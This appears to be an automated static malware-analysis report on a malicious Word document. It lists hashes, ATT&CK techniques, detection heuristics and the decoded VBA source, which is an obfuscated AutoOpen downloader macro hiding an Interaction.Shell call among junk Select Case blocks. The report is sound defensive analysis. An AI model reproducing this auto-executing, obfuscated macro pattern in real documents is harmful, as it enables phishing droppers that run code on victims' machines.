Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 abf52bb66da28da3…

MALICIOUS

Office (OLE)

134.1 KB Created: 2018-12-20 11:53:00 Authoring application: Microsoft Office Word First seen: 2019-01-25
MD5: eebc807589e38fc9299abe8bb268b57d SHA-1: 3cd09f880a0f9ed86186f89c45f9a6f10b7589d2 SHA-256: abf52bb66da28da3ec30e56875cb59fe40d710982854806ca0580c2e7d55a7f0
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a common technique for executing arbitrary commands. This strongly suggests the document's purpose is to download and execute a secondary payload, aligning with the behavior of a downloader malware. The presence of an autoopen macro further indicates an attempt at immediate execution upon opening.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6790263-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6790263-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          End Select
I40884611 = Array(s9003973, U510782, C0061948, Interaction.Shell(CVar("" + Z59460 + s9729725 + q26502851691.TextBox1) + G53079 + J9519181 + F99162 + r014463 + t0690959, 84 - 84), q946225)
   Select Case j44199741581453
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
J45644
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4494 bytes
SHA-256: 722024b0979af1b6d16d326b192f849e0a217293f99c058561b07c6090b97d48
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "q26502851691"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
J45644
End Sub

Attribute VB_Name = "U6968476"
Function J45644()
On Error Resume Next
   Select Case N234587647529653
         Case 140571356
         h183 = r7151
            W425 = CInt(j4076 / CByte(O5932))
            L7260 = s4512
         Case 148719039
         W3729 = P730
         N850 = R4880
           t9056 = CInt(D262 / CByte(z2573))
         Case 325752404
         r1071 = L397
         j589 = S8359
      End Select
I40884611 = Array(s9003973, U510782, C0061948, Interaction.Shell(CVar("" + Z59460 + s9729725 + q26502851691.TextBox1) + G53079 + J9519181 + F99162 + r014463 + t0690959, 84 - 84), q946225)
   Select Case j44199741581453
         Case 152570396
         j2849 = n3031
            X506 = CInt(E830 / CByte(L281))
            J4852 = N1257
         Case 253167961
         f8077 = f095
         Q536 = w668
           d9289 = CInt(K591 / CByte(S2733))
         Case 186377470
         j5049 = E7687
         u109 = t999
      End Select
   Select Case T84649020058929
         Case 143811214
         I5091 = c502
            h721 = CInt(j628 / CByte(Q1619))
            C2524 = s952
         Case 77176072
         d814 = z6395
         F7778 = X4837
           P5073 = CInt(O6253 / CByte(w9047))
         Case 177051334
         l7746 = l1108
         D938 = q3356
      End Select
   Select Case u789739483091124473
         Case 195264219
         Q824 = h900
            E400 = CInt(q3760 / CByte(i037))
            z630 = v996
         Case 307226189
         a7614 = P9611
         Z217 = J8997
           j3717 = CInt(Y141 / CByte(m019))
         Case 310984946
         h5149 = o843
         k918 = v9988
      End Select
   Select Case z84316110784124064680129
         Case 127800220
         l385 = Y112
            w3164 = CInt(Y0151 / CByte(l041))
            v9065 = k9845
         Case 173019800
         Q017 = N3141
         K9033 = r2192
           L255 = CInt(k761 / CByte(n225))
         Case 23737472
         F9769 = S705
         M5455 = l965
      End Select
End Function


Attribute VB_Name = "z7245179"

Attribute VB_Name = "K57589934034615"

Attribute VB_Name = "H1211804"

Attribute VB_Name = "Z436459942"

Attribute VB_Name = "w9538962"

Attribute VB_Name = "z6919277166"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F40072286114691"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E2794164077656"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "b2407508845"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P4763648184477"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "L1679177327"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.